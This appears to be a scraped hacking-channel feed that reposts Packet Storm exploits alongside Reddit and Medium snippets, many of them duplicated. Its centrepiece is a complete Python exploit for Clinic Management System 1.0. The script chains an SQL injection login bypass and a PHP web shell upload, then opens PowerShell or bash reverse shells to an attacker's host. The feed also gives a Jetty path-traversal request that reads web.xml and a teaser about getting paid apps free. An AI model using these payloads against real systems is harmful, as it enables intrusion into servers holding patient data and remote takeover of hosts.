Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Clinic Management System 1.0 Code Execution / SQL Injection
https://3.bp.blogspot.com/-YTa6qox_ltk/WWlvNeWMUbI/AAAAAAAAIMc/0l9a_Kr-MFozVC5jeSwhLNgVZ9cZuXXlQCLcBGAs/s1600/h22.png Clinic Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for a shell upload.
MD5 |
Clinic Management System 1.0 Code Execution / SQL Injection
https://3.bp.blogspot.com/-YTa6qox_ltk/WWlvNeWMUbI/AAAAAAAAIMc/0l9a_Kr-MFozVC5jeSwhLNgVZ9cZuXXlQCLcBGAs/s1600/h22.png Clinic Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for a shell upload.
MD5 |
89d48af5619424e600f5f3f549e39af5Download # Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution
# Date:21/10/2021
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10
# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e
# Vulnerability: Through SQL injection to bypass the login form it is
possible to upload a malicious file and after use that malicious file to
execute code in the remote system.
# Proof of Concept:
import requests
import sys
import time
session = requests.Session()
#http_proxy = "http://127.0.0.1:8080"
#https_proxy = "https://127.0.0.1:8080"
#proxyDict = {"http" : http_proxy,
# "https" : https_proxy}
def windows(HPW,host,shell_name):
payload =
"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload
#print(payload)
try:
request_rce = requests.get(host2,timeout=8)
except requests.exceptions.ReadTimeout:
pass
def linux(HPL,host,shell_name):
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"'
host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload
#print(payload)
try:
request_rce = requests.get(host2,timeout=8)
except requests.exceptions.ReadTimeout:
pass
def main():
host = sys.argv[1]
shell_name = sys.argv[2]
url = host + '/login.php'
values = {'user': "admin",
'email': "' OR 1 -- -",
'password': '',
'btn_login': ""
}
r = session.post(url, data=values)
cookie = session.cookies.get_dict()['PHPSESSID']
data = { 'btn_web':''}
headers= {'Cookie': 'PHPSESSID='+cookie}
request = session.post(host+ '/manage_website.php', data=data,
headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_get[cmd]`?")})
print("")
print('[*] Your Simple Webshell was uploaded to ' + host +
'/uploadImage/Logo/' + shell_name + '.php' )
print("")
LHOST = input('[+] Enter your LHOST: ')
LPORT = input('[+] Enter your LPORT: ')
print("")
HPW= "'"+LHOST+"'"+','+LPORT
HPL= ""+LHOST+""+'/'+LPORT
print('[+] Option 1: Windows')
print('[+] Option 2: Linux')
option = input('[+] Choose OS: ')
if option == "1":
windows(HPW,host,shell_name)
exit()
elif option == "2":
linux(HPL,host,shell_name)
exit()
else:
print("Please choose Windows or Linux")
main()
#Usage: python3 host shell_name
#Example: python3 http://localhost/clinic shell Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Jetty 9.4.37.v20210219 Information Disclosure
https://4.bp.blogspot.com/-hg5R_Iy9kqs/WWlu56TnyEI/AAAAAAAAIJM/rTW1_kDHOwg4grZYYDaMUD1TyZ2BewRDQCLcBGAs/s1600/h107.png
Jetty version 9.4.37.v20210219 suffers from an information disclosure vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Jetty 9.4.37.v20210219 Information Disclosure
https://4.bp.blogspot.com/-hg5R_Iy9kqs/WWlu56TnyEI/AAAAAAAAIJM/rTW1_kDHOwg4grZYYDaMUD1TyZ2BewRDQCLcBGAs/s1600/h107.png
Jetty version 9.4.37.v20210219 suffers from an information disclosure vulnerability.
MD5 |
ff583cecb4b3cb1a0a4e1562056d0981Download
# Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure
# Date: 2021-10-21
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.eclipse.org/jetty/
# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/
# Version: 9.4.37.v20210219 and 9.4.38.v20210224
# Tested on: Kali Linux
# CVE : CVE-2021-28164
POC #1 - web.xml
GET /%2e/WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Windows IKEEXT AuthIP Unvalidated GSS_ID Privilege Escalation
https://1.bp.blogspot.com/-93ZP4TpCwBw/WWlu7wGG0SI/AAAAAAAAIJg/yDCONAkAMz8MX1TtbGL6KFo1njFu_UyvACLcBGAs/s1600/h111.png
The Windows IKEEXT service does not verify the SPN when performing AuthIP authentication leading to leaking authentication tokens to untrusted systems.
MD5 |
Download
Source:packetstormsecurity.com
Windows IKEEXT AuthIP Unvalidated GSS_ID Privilege Escalation
https://1.bp.blogspot.com/-93ZP4TpCwBw/WWlu7wGG0SI/AAAAAAAAIJg/yDCONAkAMz8MX1TtbGL6KFo1njFu_UyvACLcBGAs/s1600/h111.png
The Windows IKEEXT service does not verify the SPN when performing AuthIP authentication leading to leaking authentication tokens to untrusted systems.
MD5 |
19bf4133c3ff6d58a5febb0a150ebaf7Download
Source:packetstormsecurity.com
hacking: security in practice
Intel VPro - remote management even if pc is "down"?
I've known Intel chips can implement remote management but how is this possible? And when it's exploited what will the ramifications be?
https://www.reddit.com/user/IntelBusiness/comments/py9i3m/laptops_on_intel_vpro_with_evo_designs_let_it/?utm_medium=android_app&utm_source=share
submitted by /u/ShavingPrivatesCryin
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Intel VPro - remote management even if pc is "down"?
I've known Intel chips can implement remote management but how is this possible? And when it's exploited what will the ramifications be?
https://www.reddit.com/user/IntelBusiness/comments/py9i3m/laptops_on_intel_vpro_with_evo_designs_let_it/?utm_medium=android_app&utm_source=share
submitted by /u/ShavingPrivatesCryin
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Intel VPro - remote management even if pc is "down"?
I've known Intel chips can implement remote management but how is this possible? And when it's exploited what will the ramifications...
Deep Web
How do I know which sites are “honeypots” or governmentally ran? Is there a way to tell???
Me and my friend go on DW and I’ll usually watch through discord via stream cus I’m a pussy and wont download TOR on my pc. We were curious what’s acceptable to click and what isn’t, and also how to know
submitted by /u/Top_Gate_9017
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How do I know which sites are “honeypots” or governmentally ran? Is there a way to tell???
Me and my friend go on DW and I’ll usually watch through discord via stream cus I’m a pussy and wont download TOR on my pc. We were curious what’s acceptable to click and what isn’t, and also how to know
submitted by /u/Top_Gate_9017
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How do I know which sites are “honeypots” or governmentally ran?...
Me and my friend go on DW and I’ll usually watch through discord via stream cus I’m a pussy and wont download TOR on my pc. We were curious what’s...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Анонимность? Серьезно?
https://cdn-images-1.medium.com/max/2048/1*G4bFVTSIe43O8JCRC31s5Q.jpeg
Существуют ли технологии массовой слежки за населением в других странах?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Анонимность? Серьезно?
https://cdn-images-1.medium.com/max/2048/1*G4bFVTSIe43O8JCRC31s5Q.jpeg
Существуют ли технологии массовой слежки за населением в других странах?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Анонимность? Серьезно?
Существуют ли технологии массовой слежки за населением в других странах?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
4 Way to get paid app for free (100% working)
https://cdn-images-1.medium.com/max/1280/0*-yG7_kAKDK6RG8L_
A few applications and games on Android expect you to pay to have the option to utilize them. While it’s in every case great to help the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
4 Way to get paid app for free (100% working)
https://cdn-images-1.medium.com/max/1280/0*-yG7_kAKDK6RG8L_
A few applications and games on Android expect you to pay to have the option to utilize them. While it’s in every case great to help the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
4 Way to get paid app for free (100% working)
A few applications and games on Android expect you to pay to have the option to utilize them. While it’s in every case great to help the…